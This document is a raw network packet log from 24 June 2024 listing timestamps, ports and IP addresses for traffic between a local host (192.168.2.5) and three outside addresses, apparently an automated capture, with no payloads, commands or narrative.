Jun 24, 2024 00:10:18.847997904 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.848022938 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.848033905 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.848048925 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.848063946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.848071098 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.848079920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.848098993 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.848124027 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858062029 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858120918 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858134985 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858136892 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858191013 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858277082 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858290911 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858305931 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858320951 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858324051 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858336926 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858352900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858357906 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858369112 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858398914 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858423948 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858516932 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858531952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858546972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858561993 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858568907 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858577013 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858589888 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858592987 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858608007 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858624935 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858628035 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858659029 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858690023 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858715057 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858728886 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858743906 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.858757019 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.858788013 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.866350889 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.866420984 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.866492033 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.866503000 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.866552114 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.866569996 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:18.866621971 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:18.893104076 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893155098 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.893220901 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893244028 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893260002 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893265009 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.893275023 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893287897 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.893290997 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893306017 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.893326998 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.893377066 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.906204939 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.930556059 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930572033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930588007 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930609941 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930651903 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930684090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930706024 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930721998 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930730104 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930737972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930761099 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930798054 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930900097 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930944920 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.930948019 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930963039 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.930990934 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931014061 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931111097 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931126118 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931139946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931154966 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931158066 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931178093 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931221962 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931308031 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931322098 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931337118 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931350946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931353092 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931366920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931376934 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931381941 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931418896 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931576014 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931591034 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931612015 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931653976 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931721926 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931736946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931751013 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931765079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931771994 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931790113 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931803942 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931809902 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931819916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931828022 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931842089 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931857109 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931863070 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931873083 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931890965 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931907892 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931915045 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931929111 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931936026 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931946039 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931952953 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.931961060 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931974888 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931991100 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.931993008 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932029963 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932030916 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932044983 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932060003 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932075024 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932075024 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932090044 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932106018 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932110071 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932121038 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932135105 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932137966 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932151079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932176113 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932207108 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932424068 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932439089 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932454109 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932466030 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932471037 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932490110 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932506084 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932509899 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932519913 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932534933 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932549953 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932560921 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932564974 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932579994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932586908 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932595015 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932610035 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932615042 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932625055 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932638884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932645082 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932662010 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932681084 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932708979 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932904959 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932919979 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932934046 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932948112 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932954073 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.932962894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932977915 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932992935 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.932997942 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933008909 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933020115 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933024883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933041096 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933052063 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933056116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933069944 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933084011 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933087111 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933100939 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933118105 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933124065 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933171988 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933196068 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933209896 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933235884 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933265924 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933274031 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933280945 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933295965 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933307886 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933317900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933334112 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.933336973 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933368921 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933403969 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.933893919 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:18.938657045 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:18.946712971 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946727037 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946742058 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946764946 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.946765900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946780920 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946796894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946799040 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.946811914 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946827888 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946841002 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.946847916 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.946880102 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968168974 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968183994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968199015 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968229055 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968261957 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968266010 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968277931 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968292952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968307972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968312025 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968323946 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968348980 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968360901 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968375921 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968384981 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968404055 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968425035 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968458891 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968538046 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968553066 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968566895 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968578100 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968605995 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968605995 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968621969 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968636036 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.968651056 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.968683958 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.981329918 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981362104 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981375933 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981390953 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.981430054 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981431007 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.981445074 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981460094 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981476068 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981477976 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.981508017 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:18.981524944 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:18.981564045 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.018997908 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019021034 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019037962 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019052982 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019058943 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019078016 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019084930 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019097090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019114971 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019131899 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019161940 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019258022 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019301891 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019324064 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019336939 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019366980 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019367933 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019382000 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019392967 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019397020 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019412994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019428015 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019458055 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019481897 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019495964 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019511938 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019547939 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019575119 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019591093 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019607067 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019613028 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019623041 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019644976 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019671917 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019704103 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019718885 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019736052 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019745111 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019747972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019794941 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019843102 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019857883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019874096 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019882917 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019889116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019903898 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019918919 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019932985 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019956112 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.019964933 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.019985914 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020004034 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020016909 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020025015 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020045996 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020066977 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020067930 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020093918 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020107985 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020111084 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020138025 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020147085 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020159960 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020165920 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020185947 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020207882 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020241022 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020265102 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020279884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020298958 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020315886 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020335913 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020342112 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020356894 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020373106 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020375013 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020387888 CEST	80	49723	77.91.77.81	192.168.2.5
